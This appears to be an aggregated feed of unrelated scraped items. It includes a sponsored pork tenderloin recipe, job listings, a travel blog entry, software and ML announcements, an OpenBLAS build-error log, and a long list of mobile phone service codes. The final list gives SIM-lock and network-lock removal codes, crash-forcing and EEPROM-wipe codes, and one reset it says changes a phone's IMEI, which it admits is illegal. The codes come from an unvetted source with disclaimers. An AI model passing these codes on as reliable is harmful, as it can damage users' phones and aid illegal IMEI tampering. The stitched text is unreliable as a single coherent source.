Since Smithfield uses only 100% fresh pork in these products, we wanted to use the freshest vegetables.  So we headed to the Farmers Market in Maryville, Tennessee to see what the local farms had to offer.

We ended up buying corn (not all of it!), yellow squash, yellow and green zucchini, bell pepper, sweet onion, and some small variety tomatoes.

Normally I lean towards contrasting flavors but Alexis had the idea to echo the tastes of hardwood smoked bacon and cracked black pepper in our succotash.  She was absolutely right because this was perfect together. The roasted tomatoes brought it all together with their sweet, slightly acidic flavor brightening the entire dish. 

Bacon Crusted Pork Tenderloin with Summer Squash Succotash #RealFlavorRealFast

Bacon Crusted Pork Tenderloin with Summer Squash Succotash

Ingredients




  • Smithfield Hardwood Smoked Bacon and Cracked Black Pepper Marinated Fresh Pork Tenderloin
  • 1 cup cherry tomatoes
  • olive oil
  • kosher salt
  • 6 slices Smithfield Hometown Original Sliced Bacon, chopped
  • 2 cups Summer squash, cut into 1/2" cubes
  • 1 cup diced sweet onion
  • 1 cup fire roasted corn kernels (about 2 ears or 1 can, drained)
  • 1/3 cup fire roasted red bell pepper
  • 1 1/2 teaspoons kosher salt
  • 1 teaspoon cracked black pepper

Instructions

  1. Set up your grill for indirect cooking and preheat it to 425°F (medium-high heat).
  2. Fire roast the tomatoes and pork.  Lightly coat the tomatoes with a small amount (1/2 teaspoon or so) of olive oil and season with kosher salt.  Place on a small roasting pan.  Place the pan and the Smithfield pork tenderloin on the grill, close the lid and roast until the pork reaches an internal temperature of 140°F - about 25 to 30 minutes.  Meanwhile make the succotash.
  3. Preheat a heavy bottom skillet over medium-low heat on a grill side burner or stove top.  Add the chopped bacon and cook until the bacon is crisp, about 8 minutes.  Use a slotted spoon to remove the bacon to a paper towel lined plate.  Remove all but 2-3 tablespoons of rendered bacon fat.
  4. Add the squash and onion and season with salt and pepper.  Cook, stirring occasionally, until they are tender, about 5 to 8 minutes.  
  5. Add the corn and bell pepper, stir to mix in and cook until warmed through, about 1-2 minutes. Taste for seasoning, adjust with salt and pepper as desired.  Remove from heat and garnish with bacon crumbles.
  6. Remove the tomatoes and Smithfield pork tenderloin from heat and allow to rest for 5 minutes. 
  7. Slice the tenderloin and serve with the roasted tomatoes and Summer squash succotash.

Notes/Substitutions 


  • Hardwood Smoked Bacon and Cracked Black Pepper Marinated Fresh Pork Tenderloin - This also goes well with Smithfield's Roasted Garlic and Cracked Black Pepper Marinated Fresh Tenderloin.  They have expanded their marinated fresh products to include a wide variety of fresh cuts, including pork roasts, loin filets, sirloins, pork chops and tenderloins, which can be sliced or cubed for even faster cooking. 

  • Summer squash blend - We ended up using the yellow and green zucchini but you can use whatever is fresh and in season.



Fresh pork and fresh veggies - hard to go wrong there.

You can buy fire roasted corn on the canned vegetable aisle now and jarred fire roasted red bell peppers are available as well.  I prefer to do my own and grilled these on a gas powered infrared grill.

How to remove corn from the cob
With normal sized ears, you get about 1/2 cup of corn per ear.

I fire roasted mine on a kamado style grill but you can use a kettle grill, gas grill, pellet cooker, or even your oven.  The typical indirect set up for a kamado grill is like this, with a plate setter or heat deflector between the meat and the hot coals. Obviously you take the meat out of the package; this is just for demonstration purposes.

That set up works fine.  But what works even better is to use a raised rack on your grill or the upper rack of your oven.  Positioning the meat higher up in the grill will let you use the heat reflecting down from the grill lid to do a better job of crisping that bacon on top of the roast.  Here I used a simple homemade raised rack consisting of a spare grill grate and 4 legs made out of bolts, nuts, and washers.

The bacon in the crust is already hardwood smoked but I used natural hardwood lump coal for fire roasting the pork tenderloin to reinforce the smokiness.

When you put the tenderloin on the grill, make sure that the bacon crust is facing upwards.  It will be obvious which side is the bacon crust once you open the package.  That's parchment paper under the tomatoes, I use it for easier clean up.  I used Korean sea salt on the tomatoes because I like the huge flakes but kosher salt works fine.

Mise en place (aka "mess in place") makes your cooking easier.  You can have all of this prepped out the night before and save even more time.

Side burners on grills tend to run hotter than stove top burners, so it helps greatly to use a heavy bottom pan like this cast iron pan.  

Tip:  If you want to take the Smithfield Hardwood Smoked Bacon and Cracked Black Pepper Marinated Fresh Pork Tenderloin to the next level, spritz it every 10 minutes with an 8:1 mixture of apple juice and bourbon.  The sweet smoky flavor rocks with the bacon and black pepper.


Summer Squash Succotash recipe
You can just stir yours but I like to toss the veggies to get that rendered bacon and seasoning all over them.

recipe ideas summer squash and or zucchini
Once your squash is just starting to turn tender, it is time to add the other veggies.  It took right at 5 minutes for mine but it could take as long as 8.

Smithfield Marinated Fresh Pork #RealFlavorRealFast
Mmmmm crispy bacon.  Fire roasting the tomatoes makes them tender and concentrates their naturally sweet taste.

Summer squash zucchini succotash
The general rule of thumb is that eating a colorful variety of vegetables is good for you, so this must be a multi-vitamin! 

Handle the roast carefully when taking it off.  I recommend using a long spatula instead of tongs because squeezing the tongs can break off pieces of the crust.

Smithfield Marinated Fresh Pork #RealFlavorRealFast
I surprised myself that I was able to get this done in 30 minutes.  I'm notorious for dragging out dinner and eating at 8pm.
Here's another idea for using their Marinated Fresh Pork products. 


Smithfield is also challenging you to see what you can do with Marinated Fresh Pork to get a flavorful meal ready in about 30 minutes with their “Real Flavor, Real Fast” contest. For more 30-minute meal preparation ideas, and to submit your original tip for a chance to win great prizes, head to www.SmithfieldRealFlavorRealFast.com

Addendum:  I'm proud to have made it through an entire post about succotash without saying that word which rhymes with buffering. 

          Device Driver Development Engineer - Intel - Singapore   
Knowledge of XDSL, ETHERNET switch, wireless LAN, Security Engine and microprocessor is an advantage. Linux Driver/Kernel development for Ethernet/DSL/LTE Modem...
From Intel - Sat, 17 Jun 2017 10:23:08 GMT - View all Singapore jobs
          Travel day morning no-coffee notes   

Today's a travel day, starting now, at 4:45AM Pacific. My flight leaves Seattle in three hours, change planes in Atlanta, arrive in Jacksonville, then drive for 1.5 hours before arriving at the beach, assuming all goes well, knock wood, praise Murphy. Add three hours for time zones, and I should get home in time for Sixty Minutes. I'll get my daily walk in Atlanta.

I had a very stimulating visit with Microsoft, and decided to stay in the US for my 50th birthday, only eight days away. I'll go to England toward the end of the month. Reason --> I want to spend two or three weeks working on the outliner. It's overdue. It got the kernel changes it needed, thanks to Dave Luebbert. Of course it's still a bit rough, and it will be when the beta is made publicly available, but it works, it has the right window dressing, now the furniture needs to be brought in (not all of it) and then it's time to sweep the floors, before the occupants arrive and put dishes in the cabinets and pictures on the wall. I want to get back to working with users as a software developer. I miss it. A lot.

Dave Luebbert and I had a great visit too. He called last night to talk some about the outliner. He wanted to know if an item could be routed to more than one category. I said it could. He said he had listened to the podcast with my dad, and like everyone else who heard it, was charmed. IPSTIQ all the way. Kosso says that to me all the time. It turns out he's friends with Phil Torrone. Phil and Beth are really smart, really nice, charming, honest. But if you listened to yesterday's podcast you know that too.

Had dinner last night with Chris Pirillo and Ponzi. She's from North Carolina. That means she's from Cackalacky and a Tarheel. Forgot to say that to her. We talked about Julie Leung, and Gnomedex. I'm going to get a special deal for Scripting News readers. You gotta go, it's going to be a great show. I told Chris about the outliner. He did a little jumping up and down thing. It's good. I'm going to talk about the outliner here in June. And in England in May. And New York. Maybe elsewhere.

Okay now I have to shut this thing and get out of here, go to the airport and get on the plane.

Namaste y'all!


          TuxMachines: Latest Clonezilla Live Stable Update Includes a Lite Server, Linux Kernel 4.11.6   

Clonezilla Live and GParted Live developer Steven Shiau is pleased to announce the release and immediate availability for download of a new stable version of his widely-used Clonezilla Live project.

Read more



          Basis Administrator - Aecon Group - Toronto, ON   
Performs implementation of OSS notes, support pack upgrades, kernel upgrades and systems refreshes across the landscape....
From Aecon Group - Tue, 06 Jun 2017 23:47:00 GMT - View all Toronto, ON jobs
          Slides: Machine Learning Summer School @ Max Planck Institute for Intelligent Systems, Tübingen, Germany   


Here are the slides of some of the presentations at the Machine Learning Summer School at the Max Planck Institute for Intelligent Systems, Tübingen, Germany

Shai Ben-David (Waterloo): Learning Theory. Slides part 1 part 2 part 3
Dominik Janzing (MPI for Intelligent Systems): Causality. Slides here.
Stefanie Jegelka (MIT): Submodularity. Slides here.
Jure Leskovec (Stanford): Network Analysis. Slides 1 2 3 4
Ruslan Salakhutdinov (CMU): Deep Learning. Slides part 1 part 2
Suvrit Sra (MIT): Optimization. Slides 1 2 3A 3B
Bharath Sriperumbudur (PennState): Kernel Methods. Slides part 1 part 2 part 3
Max Welling (Amsterdam): Large Scale Bayesian Inference with an Application to Bayesian Deep Learning. Slides here.
Bernhard Schölkopf (MPI for Intelligent Systems): Introduction to ML and a talk on Causality. Slides here.

h/t Russ





          Wiki Page: Solid Working Area Accuracy Information   
Applies To Product(s): MICROSTATION Version(s): 08.00.01.19 Environment: N\A Area: General Subarea: N\A Original Author: Bentley Technical Support Group
Problem: Solid Working Area Accuracy Information. Version: 08.00.01.19 Product: MicroStation V8 Area: Parasolid
Solution Information: The solid modeling kernels require coordinate data at a fixed precision. In order to guarantee enough precision is available, MicroStation defines the solids working area (SWA). The SWA is effectively a design cube centered around the center of design. The length of the cube's edges can be found under Settings > Design File > Working Units > Advanced > Working Areas > Solids. The purpose of the SWA value is to reduce the working volume to a more manageable size when working with solids, which also increases the accuracy for solids. Maximum accuracy for solids can be achieved by setting the Resolution to 1,000,000 per Meter and setting Solids to 1 Kilometer. How much accuracy is required depends more on the size of the smallest detail (blend, etc.) than on the size of the solid itself. Because of this, it is difficult to give a definitive answer; it also depends on the types of operations that are planned and on what types of geometry. Less accuracy is required for Boolean operations on orthogonal (square) elements than for working with a lot of complex blends on B-Spline surfaces. The precision needs to at least cover the smallest detail, but some operations in Parasolid may require more precision for the internal calculations.
Conclusion: The Solids Working Area can be changed, and there is a lot of flexibility there, but the optimal setting is when the SWA is 1 km (to match the Parasolid modeling kernel accuracy).
Notes: Changing the SWA value does not change the Resolution; that is, the size of elements in the file will not be changed. It is possible to move Parasolid elements out of the SWA, but they will not be able to be modified until returned to within the SWA. 
The SWA is centered about the center of the design area, not the global origin. Not applicable to V8i based products.
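The accuracy tradeoff described above can be sanity-checked with back-of-the-envelope arithmetic. This is a minimal sketch using the illustrative settings quoted in the text (Resolution of 1,000,000 units per meter, 1 km SWA cube); it is not MicroStation API code, just a demonstration of how the two settings bound the smallest representable detail:

```python
# Sketch of the Solids Working Area (SWA) precision tradeoff.
# Assumes the example settings from the text: 1,000,000 units per
# meter and a 1 km SWA cube (illustrative numbers only).
units_per_meter = 1_000_000          # Resolution setting
swa_edge_m = 1_000                   # SWA cube edge: 1 kilometer

# Fixed-precision coordinates give a finite number of addressable
# positions along each axis of the SWA cube...
positions_per_axis = units_per_meter * swa_edge_m

# ...and a smallest representable detail size; blends or B-spline
# features smaller than this cannot be resolved accurately.
smallest_detail_m = 1 / units_per_meter

print(positions_per_axis)   # 1000000000
print(smallest_detail_m)    # 1e-06
```

Doubling the SWA edge halves nothing in the file itself, but it doubles the coordinate range the fixed precision must cover, which is why a 1 km SWA is recommended as the optimum.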
          NSA is on GitHub, sharing dozens of projects   
One of the US government’s most tight-lipped organisations, the National Security Agency (NSA), has opened an official GitHub account and has already shared code repositories for 32 different projects under the NSA Technology Transfer Program (TTP).

Some of these are ‘coming soon.’ Many aren’t new, either, and have been available for some time; several of the technologies have been in use for years. SELinux (Security-Enhanced Linux), for example, has been part of the Linux kernel for years. None of them is as revealing as you might have hoped, but there are several entries of note. The “Lat Lon Tools Plugin,” for example, is a suite of tools used to zoom to coordinates in Google Maps and Google Earth, while “Maplesyrup” was created to examine the security state of an ARM-based device.

The most secretive of the US intelligence agencies employs genius-level coders and mathematicians to break codes, gather information on adversaries, and develop hacking tools like EternalBlue to defend the country against digital threats.

The move is a step towards a more open environment, however much of an oxymoron that might be.

Since the Snowden leaks in 2013, the organisation that has always preferred to work in the dark has gradually increased its public presence. It opened a Twitter account the same year the leaks were made, and it was the first profile Edward Snowden followed when he joined the micro-blogging site in 2015.

Engaging with techies via Github is a great way to sanitise its image, and potentially recruit talent.

          Friday Farmers Market At Everett Mall Looking For Kids   
The KERNEL Kids Program has been added to the list of things happening at the Friday Farmers Market at the Everett Mall, every Friday from 3-7 PM. KERNEL (Kids Eating Right-Nutrition and Exercise for Life) is a project designed to engage children in learning about lifelong healthy eating habits, gardening, and exercise. Upon completion of […]
          Error installing package openblas-0.2.19.p0 on OS X   
My computer is a MacBook Pro 13" with a 2.8 GHz Intel Core i7 processor and 16 GB of 1600 MHz DDR3 memory, running OS X 10.9.5. I installed Sage from source and got one error message (see below). I am not very experienced, so I would appreciate any help I can get in order to fix this problem. (What happens if I just disregard the error?) Relevant contents of the log file /Users/MacMesser/Documents/INST_SAGE/sage-7.6/logs/pkgs/openblas-0.2.19.p0.log:
-DCHAR_CNAME=\"sdsdot_k\" -DNO_AFFINITY -I.. -UDOUBLE -UCOMPLEX -UCOMPLEX -UDOUBLE -DDSDOT ../kernel/x86_64/../generic/dot.c -o sdsdot_k.o gcc -c -O2 -DMAX_STACK_ALLOC=2048 -DEXPRECISION -m128bit-long-double -Wall -m64 -DF_INTERFACE_GFORT -fPIC -DNO_WARMUP -DMAX_CPU_NUMBER=4 -DASMNAME=_dsdot_k -DASMFNAME=_dsdot_k_ -DNAME=dsdot_k_ -DCNAME=dsdot_k -DCHAR_NAME=\"dsdot_k_\" -DCHAR_CNAME=\"dsdot_k\" -DNO_AFFINITY -I.. -UDOUBLE -UCOMPLEX -UCOMPLEX -UDOUBLE -DDSDOT ../kernel/x86_64/../generic/dot.c -o dsdot_k.o ../kernel/x86_64/sdot_microk_haswell-2.c:37:no such instruction: `vxorps %ymm4, %ymm4,%ymm4' ../kernel/x86_64/sdot_microk_haswell-2.c:38:no such instruction: `vxorps %ymm5, %ymm5,%ymm5' ../kernel/x86_64/sdot_microk_haswell-2.c:39:no such instruction: `vxorps %ymm6, %ymm6,%ymm6' ../kernel/x86_64/sdot_microk_haswell-2.c:40:no such instruction: `vxorps %ymm7, %ymm7,%ymm7' ../kernel/x86_64/sdot_microk_haswell-2.c:41:Alignment too large: 15. assumed. 
../kernel/x86_64/sdot_microk_haswell-2.c:43:no such instruction: `vmovups (%rsi,%rax,4), %ymm12' ../kernel/x86_64/sdot_microk_haswell-2.c:44:no such instruction: `vmovups 32(%rsi,%rax,4), %ymm13' ../kernel/x86_64/sdot_microk_haswell-2.c:45:no such instruction: `vmovups 64(%rsi,%rax,4), %ymm14' ../kernel/x86_64/sdot_microk_haswell-2.c:46:no such instruction: `vmovups 96(%rsi,%rax,4), %ymm15' ../kernel/x86_64/sdot_microk_haswell-2.c:47:no such instruction: `vfmadd231ps (%rdx,%rax,4), %ymm12,%ymm4' ../kernel/x86_64/sdot_microk_haswell-2.c:48:no such instruction: `vfmadd231ps 32(%rdx,%rax,4), %ymm13,%ymm5' ../kernel/x86_64/sdot_microk_haswell-2.c:49:no such instruction: `vfmadd231ps 64(%rdx,%rax,4), %ymm14,%ymm6' ../kernel/x86_64/sdot_microk_haswell-2.c:50:no such instruction: `vfmadd231ps 96(%rdx,%rax,4), %ymm15,%ymm7' ../kernel/x86_64/sdot_microk_haswell-2.c:54:no such instruction: `vextractf128 $1 ,%ymm4,%xmm12' ../kernel/x86_64/sdot_microk_haswell-2.c:55:no such instruction: `vextractf128 $1 ,%ymm5,%xmm13' ../kernel/x86_64/sdot_microk_haswell-2.c:56:no such instruction: `vextractf128 $1 ,%ymm6,%xmm14' ../kernel/x86_64/sdot_microk_haswell-2.c:57:no such instruction: `vextractf128 $1 ,%ymm7,%xmm15' ../kernel/x86_64/sdot_microk_haswell-2.c:58:no such instruction: `vaddps %xmm4, %xmm12,%xmm4' ../kernel/x86_64/sdot_microk_haswell-2.c:59:no such instruction: `vaddps %xmm5, %xmm13,%xmm5' ../kernel/x86_64/sdot_microk_haswell-2.c:60:no such instruction: `vaddps %xmm6, %xmm14,%xmm6' ../kernel/x86_64/sdot_microk_haswell-2.c:61:no such instruction: `vaddps %xmm7, %xmm15,%xmm7' ../kernel/x86_64/sdot_microk_haswell-2.c:62:no such instruction: `vaddps %xmm4, %xmm5,%xmm4' ../kernel/x86_64/sdot_microk_haswell-2.c:63:no such instruction: `vaddps %xmm6, %xmm7,%xmm6' ../kernel/x86_64/sdot_microk_haswell-2.c:64:no such instruction: `vaddps %xmm4, %xmm6,%xmm4' ../kernel/x86_64/sdot_microk_haswell-2.c:65:no such instruction: `vhaddps %xmm4, %xmm4,%xmm4' 
../kernel/x86_64/sdot_microk_haswell-2.c:66:no such instruction: `vhaddps %xmm4, %xmm4,%xmm4' ../kernel/x86_64/sdot_microk_haswell-2.c:67:no such instruction: `vmovss %xmm4, (%rcx)' ../kernel/x86_64/sdot_microk_haswell-2.c:68:no such instruction: `vzeroupper' make[4]: *** [sdot_k.o] Error 1 make[4]: *** Waiting for unfinished jobs.... ../kernel/x86_64/saxpy_microk_haswell-2.c:37:no such instruction: `vbroadcastss (%rcx), %ymm0' ../kernel/x86_64/saxpy_microk_haswell-2.c:38:Alignment too large: 15. assumed. ../kernel/x86_64/saxpy_microk_haswell-2.c:40:no such instruction: `vmovups (%rdx,%rax,4), %ymm12' ../kernel/x86_64/saxpy_microk_haswell-2.c:41:no such instruction: `vmovups 32(%rdx,%rax,4), %ymm13' ../kernel/x86_64/saxpy_microk_haswell-2.c:42:no such instruction: `vmovups 64(%rdx,%rax,4), %ymm14' ../kernel/x86_64/saxpy_microk_haswell-2.c:43:no such instruction: `vmovups 96(%rdx,%rax,4), %ymm15' ../kernel/x86_64/saxpy_microk_haswell-2.c:44:no such instruction: `vfmadd231ps (%rsi,%rax,4), %ymm0,%ymm12' ../kernel/x86_64/saxpy_microk_haswell-2.c:45:no such instruction: `vfmadd231ps 32(%rsi,%rax,4), %ymm0,%ymm13' ../kernel/x86_64/saxpy_microk_haswell-2.c:46:no such instruction: `vfmadd231ps 64(%rsi,%rax,4), %ymm0,%ymm14' ../kernel/x86_64/saxpy_microk_haswell-2.c:47:no such instruction: `vfmadd231ps 96(%rsi,%rax,4), %ymm0,%ymm15' ../kernel/x86_64/saxpy_microk_haswell-2.c:48:no such instruction: `vmovups %ymm12, (%rdx,%rax,4)' ../kernel/x86_64/saxpy_microk_haswell-2.c:49:no such instruction: `vmovups %ymm13, 32(%rdx,%rax,4)' ../kernel/x86_64/saxpy_microk_haswell-2.c:50:no such instruction: `vmovups %ymm14, 64(%rdx,%rax,4)' ../kernel/x86_64/saxpy_microk_haswell-2.c:51:no such instruction: `vmovups %ymm15, 96(%rdx,%rax,4)' ../kernel/x86_64/saxpy_microk_haswell-2.c:55:no such instruction: `vzeroupper' make[4]: *** [saxpy_k.o] Error 1 make[3]: *** [libs] Error 1 Error building OpenBLAS real 1m17.400s user 3m33.062s sys 0m56.443s 
************************************************************************ Error installing package openblas-0.2.19.p0
          Get The Collection Of Mobile Reset Key    
mobile reset key
Mobile phones are mainly used to talk, but nowadays they are used for many other things as well: as a camera, as an iPod, etc.

Sometimes a phone gets overloaded and needs to be reset. If you have no way to do it, here are the keys to reset it easily.

All phone reset

All China
default user code: 1122, 3344, 1234, 5678
*#66*# Set Factory Mode CONFIRMED
*#8375# Show Software Version CONFIRMED
*#1234# A2DP ACP Mode CONFIRMED
*#1234# A2DP INT Mode CONFIRMED
*#0000# + Send : Set Default Language CONFIRMED
*#0007# + Send : Set Language to Russian CONFIRMED
*#0033# + Send : Set Language to French CONFIRMED
*#0034# + Send : Set Language to Spanish CONFIRMED
*#0039# + Send : Set Language to Italian CONFIRMED
*#0044# + Send : Set Language to English CONFIRMED
*#0049# + Send : Set Language to German CONFIRMED
*#0066# + Send : Set Language to Thai CONFIRMED
*#0084# + Send : Set Language to Vietnamese CONFIRMED
*#0966# + Send : Set Language to Arabic CONFIRMED
*#800# makes the Etel E10 model display the message "BT power on", but the display does not show the Bluetooth power-on icon. (Actually it makes BT stuck, but after restarting it becomes normal. <tested by me>)

More codes to reset Chinese mobile phones
*#77218114#
*#881188#
*#94267357#
*#9426*357#
*#19912006#
*#118811#
*#3646633#

also found these

Service codes Konka:
C926 software version: *320# Send
C926 set default language: *#0000# Send
C926 set English language: *#0044# Send

Service codes GStar:
GM208 (Chinese Nokea 6230+) engineering menu: *#66*#
Set language to English: *#0044#
Set language to Russian: *#0007#

ZTE Mobile:
1- *938*737381#
2- PHONE WILL DISPLAY DONE
3- POWER OFF YOUR PHONE AND POWER ON AGAIN

Service codes Alcatel:
E205 unlocking phone code: press ***847# without SIM card
E900 software version: *#5002*8376263#
E900 full reset: *2767*3855#

Service codes Spice:
S404 enable COM port: *#42253646633# -> Device -> Set UART -> PS -> UART1/115200
S410 engineer mode: *#3646633#
S900 software version: *#8375#
S900 serial no: *#33778#

Service codes Philips:
S200 enable COM port: *#3338913# -> Device -> Set UART -> PS -> UART1/115200

Service codes "Chinese" models:
default user code: 1122, 3344, 1234, 5678
Engineer mode: *#110*01#
Factory mode: *#987#
Enable COM port: *#110*01# -> Device -> Set UART -> PS Config -> UART1/115200
Restore factory settings: *#987*99#
LCD contrast: *#369#
software version: *#800#
software version: *#900#

Service codes BenQ:
software version: *#300#
test mode: *#302*20040615#

Service codes Pantech:
software version: *01763*79837#
service menu: *01763*476#
reset defaults (phone/user code reset to default): *01763*737381#

Service codes VK-Mobile **x, 5xx:
software version: *#79#
software version: *#837#
service menu: *#85*364# (hold #)

Service codes VK200, VK2000, VK2010, VK2020, VK4000:
software version: *#79#
service menu: *#9998*8336# (hold #)
reset defaults (phone/user code reset to default): *#9998*7328# (hold #)

Service codes LG:
software version: 2945#*#
KG300 NVRAM format: 2945#*# -> menu 15

Service codes Sony-Ericsson:
J100 software version: #82#

Service codes Fly:
M100 software version: ####0000#
2040(i) reset defaults: *#987*99# Send
MX200 reset defaults: *#987*99# Send
MX200 software version: *#900# Send
SL300m reset defaults: *#987*99# Send
SL300m software version: *#900# Send
SL500m reset defaults: *#987*99# Send
SL500m software version: *#900# Send
MP500 reset defaults: *#987*99# Send
MP500 software version: *#900# Send
Set language to English: *#0044#
Set language to Russian: *#0007#


Service codes Motofone-F3:
Motofone F3 software version: **9999* Send
***300* Set SIM Pin
***310* / ***311* SIM Pin ON | OFF
***000* Reset Factory settings
***644* Set Voicemail number
***260* / ***261* Auto keypad lock ON | OFF
***510* / ***511* Voice Prompts ON | OFF
***160* / ***161* Restricted Calling (Phonebook only) ON | OFF
***200608* Send: software version
***200606* Send: software version
***200806* Send: flex version
***250* / ***251* Keypad tones ON | OFF
***470* Select time format
***500* /***501* Prepaid Balance Display ON | OFF
***520* Change language

Service codes Motorola:
C113, C114, C115, C115i, C116, C117, C118 software version: #02#*
C138, C139, C140 software version: #02#*
C155, C156, C157 software version: #02#*
C257, C261 software version: #02#*
V171, V172, V173 software version: #02#*
V175, V176, V176 software version: #02#*
C168, W220 software version: *#**837#
W208, W375 software version: #02#* and "yes"

I-mobile Inno30, 55, 89, 90, 99, 100, A10, A20, P10, Vk200
- Set full factory *741*737381#
- Set full factory *741*7373868#
- Set full factory *741*2878#
- Set Engineer Mode *888*888#
- Check software version *888*837#

I-mobile 100 ,200 , 313
- Check software version #*888#

I-mobile 309, 310
- Check software version *0*4636#
- Test Mode *0*6268#

I-mobile 311
- Check software version #*878#

I-mobile 511
- Check software version *1222*1#

I-mobile 301, 302,308, 508, 601, 602, 603, 604, 606, 611, 901, 902
- Check software version *#159#
- Set Factory Mode *#32787#
- Set Engineer Mode *#3646633#

I-mobile 503, 506, 605, 600, 607, 608
- Set Engineer Mode ***503#
- Set Factory Mode ***504#
- Set Auto Test ***505#

I-mobile 509, 612
- Set Factory Mode *#66*#

I-mobile 504, 505, 803
- Check software version *68*48#
- Set full factory *789#
- Test Mode *#789#

I-mobile 305, 306, 315, 510, 609, 609i,516
- Check software version *#8375#
- Set Factory Mode 878
I-mobile 610
- Check software version *#22#

I-mobile J101, J102
- Test Mode *23638777*783781#

I-mobile 502, 502i, 505, k9, 802
- Check software version *201206*4636#

Samsung
Samsung Programmers code!(Secret code)


  All Samsung Hard Reset Codes
 1.)*2767*3855#
2.)*7465625*638*00000000*00000000#
3.)#7465625*638*00000000#
Following is the list of code for SIM issue:

*7465625*746*code# Enables SIM lock
#7465625*746*code# disables SIM lock
*7465625*28746# Auto SIM lock On
#7465625*28746# Auto SIM lock Off
*#0778# Sim Serv, Table.
*#0638# SIM Network ID.
*#0746# SIM info.
*#2576# SIM error.
*#0778# To see what your SIM supports.
*#0746# Your sim type.
*#9998*NET# SIM Network ID
*#9998*778# SIM Serv. Table.
*#9998*2576# Forces SIM Error.

To remove sim locks:
#0111*0000000#
*2767*66335#
*2767*3700#
*2767*7100#
*2767*8200#
*2767*7300#
*2767*2877368#
*2767*33927#
*2767*85927#
*2767*48927#
*2767*37927#
*2767*28927#
*2767*65927#
*2767*29927#
*2767*78927#
*2767*79928#
*2767*79928#
*2767*82927#
*2767*787927#
*2767*73738927#
*2767*33667#
*2767*85667#
 PROGRAMMER CODES!

*#06#=Displays IMEI NO.
*#9999#=SW Version.
*#8888#=HW Version.
*#0842#=Vibrator.
*#0289#=Buzzer.
*#0228#=Battery Stat.
*#0782#=RTC Display
*#0523#= LCD Contrast.
*#0377#=NVM error log
*#5646#=GSM Logo Set.
*#0076#=Production No.
*#3323#=Forced Crash
*#9324#=Netmon <> press the hang-up key to exit.
*#32439483 =Digital Audio Interference off.
*#32436837#=Digital Audio Interference on.
*#9998*JAVA# =Edit GPRS/CSD settings
*#9998*Help# =Screen / List of codes.
*#9998*=RTC# =RTC Display.
*#9998*bat#=Battery Status.
*#9998*buz#=Turns Buzzer On.
*#9998*vub# =Turns Vibrator On.
*#9998*LCD#=LCD Contrast.
*#9998*9999#=Software Version.
*#9998*8888#=Hardware Version.
*#9998*377#=Non Volatile Memory Error Log
*#9998*968#=Reminder Tune.
*#9998*NVM#=Displays Non-Volatile Memory Status.
*#9999*C#=Netmon.
*#9998* DEAD# =Forces Phone Crash.
*#9998*533# =(LED).
*#999* =Show date and alarm clock.
*#8999*638# =show network information.
*#9998*5646# =change operator logo at startup.
*#9998*968# =View melody alarm.
*2767*MEDIA# =Resets the media on phone
*2767*FULL# =Resets the EEPROM
*2767*CUST# =Resets the custom EEPROM.
*2767*JAVA#= Resets JAVA downloads
*2767*STACKREST# =RESETS STACK.
*2767*225RESET# =VERY Dangerous.
*2767*688# = Unlocking code
*#8999*8378# = All in one code
*#4777*8665# = GPRS Tool
*#8999*3825583# = External Display
*#8999*377# = Errors
*#2255# = call list
#*5737425# = JAVA Something; choose 2 and it crashed.
#*536961# = Java Status Code
#*536962# = Java Status Code
#*536963# = Java Status Code
#*53696# = Java Status Code
#*1200# = AFC DAC Val
#*1300# =IMEI
#*2562# = White for 15 secs, then restarts.
#*2565# =Check Blocking
#*3353# =check code
#*3837# = White for 15 secs, then restarts.
#*3849# = White for 15 secs, then restarts.
#*7222# = Operation Type
#*7224# = I got ERROR !
#*7252# = Operation Type
#*7271# =Multi Slot
#*7271# =Multi Slot
#*7337# = EEPROM Reset (unlocks and resets WAP settings)
#*2787# =CRTP ON/OFF
#*3737#= L1 Dbg Data
#*5133# =L1 Dbg Data
#*7288# =GPRS Attached
#*7287# =GPRS Detached
#*7666# =SrCell Data
#*7693# =Sleep Act/Deact
#*7284# =Class B/C
#*2256# =Calibration Info
#*2286# =Battery Data
#*2679# =Copycat Feature
#*3940# =External loop 9600 bps
#*8462# =sleep time
#*5176# =L1 Sleep
#*5187#= L1C2G Trace
#*3877#= Dump Of spy trace
*#8999*8376263# =HW Ver SW Ver and build date
*#746565# =Checks the locks
*7465625*638*Code# =Enables Network lock
#7465625*638*Code#= Disables Network lock
#7465625*782*code# =Disables Subset lock
*7465625*782*code# =Enables subset lock



*Known Unlock CODES*
S500/ P400/ E500/ E700/ X100/ X600/
E100/
Enter *2767*3855# with and accepted SIM
card If this codes fails,

For accepted sim card insert below code:
Enter *2767*688# or #*7337#
A300/ A400 / A800
*2767*637#
S100 / S300 / V200 / V205 / E710 / E715
/ D410 / X426/
*2767*7822573738#

Try this if above code fails:

1.) Insert SIM card.
2.) Type #9998*3323#; if it displays wrong card,
3.) press exit and select 7.
4.) Phone will reboot.
5.) SIM should work.
6.) Type *0141# and press call.
7.) Power off the phone and insert another SIM card.
8.) If a code is requested, enter 00000000.
NOTE: PAKIDEA.COM IS NOT RESPONSIBLE FOR ANY PROBLEMS THAT OCCUR WHILE USING THESE CODES. IT IS ALL DOWN TO THE USER WHO USES THEM.

*#9998*289# : Change Alarm Buzzer Frequency
*#9998*364# : Watchdog
*#9998*523# : Change LCD contrast - Only with version G60RL01W
*#9998*746# : SIM File Size
*#9998*862# : Vocoder Reg - Normal, Earphone or carkit can be selected
*#9998*786# : Run, Last UP, Last DOWN
If the above codes don't work, change *#9998* to *#0, i.e. *#9998*523# changes to *#0523#. Another thing that will help is to remove your SIM card.
*0001*s*f*t# : Changes serial parameters (s=?, f=0,1, t=0,1) (incomplete)
*0003*?# : unknown
*0003*?# : unknown

*#9998*377# : EEPROM Error Stack - Use side keys to select values. Cancel and ok
*#9998*427# : Trace Watchdog
*#9998*785# : RTK (Run Time Kernel) errors - if OK then phone is reset, info is put in memory error.
*#9998*778# : SIM Service Table

*#9998*947# : Reset On Fatal Error
*#9998*872# : Diag
*#9998*999# : Last/Chk
*#9998*324# : Debug screens
*#9998*636# : Memory status
*#9998*544# : Jig detect
*#9998*842# : Test Vibrator - Flash the screenligth during 10 seconds and vibration activated
*#9998*837# : Software Version

*#9998*228# : Battery status (capacity, voltage, temperature)
*#9998*246# : Program status

*#9998*9266# : Yann debug screen (=Debug Screens?)
*#9998*9999# : Software version

SP-unlock SGH-600
*2767*3855# : Full EEPROM Reset ( THIS CODE REMOVES SP-LOCK!! )
But also changes IMEI to 447967-89-400044-0. (Doing this is illegal)

*2767*2878# : Custom EEPROM Reset
*These codes have been tested with version FLD_2C6 G60SB03X of Samsung SGH-600

Samsung SGH-600 Unlock Codes
*#9999# : Show Software Version
